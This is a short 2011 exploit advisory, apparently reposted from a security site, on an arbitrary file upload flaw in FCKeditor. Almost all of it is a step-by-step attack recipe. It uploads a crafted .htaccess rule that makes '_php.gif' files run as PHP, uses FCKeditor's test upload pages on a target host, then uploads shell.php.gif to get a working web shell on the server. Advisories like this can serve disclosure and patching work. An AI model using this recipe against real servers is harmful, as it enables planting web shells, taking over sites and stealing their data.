FCKeditor all version File Upload-vulnerability warning-the black bar safety net

2011-10-22T00:00:00
ID MYHACK58:62201132109
Type myhack58
Reporter 佚名
Modified 2011-10-22T00:00:00

Description

In The Name Of GOD

[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability

[+] Date: 2 0 1 1

[+] script:http://sourceforge. net/projects/fckeditor/

[+] Author : pentesters. ir

[+] Website : WwW.PenTesters.IR


  1. create a. htaccess file:

code:

<FilesMatch “_php.gif”>

SetHandler application/x-httpd-php

</FilesMatch>

  1. Now upload this htaccess with FCKeditor.

http://target.com/FCKeditor/editor/filemanager/upload/test.html

http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html


  1. Now upload shell.php.gif with FCKeditor.

  2. After the upload shell.php.gif the name “shell.php.gif” change to “shell_php.gif” automatically.

5.http://target.com/anything/shell_php.gif

  1. Now shell is available from server.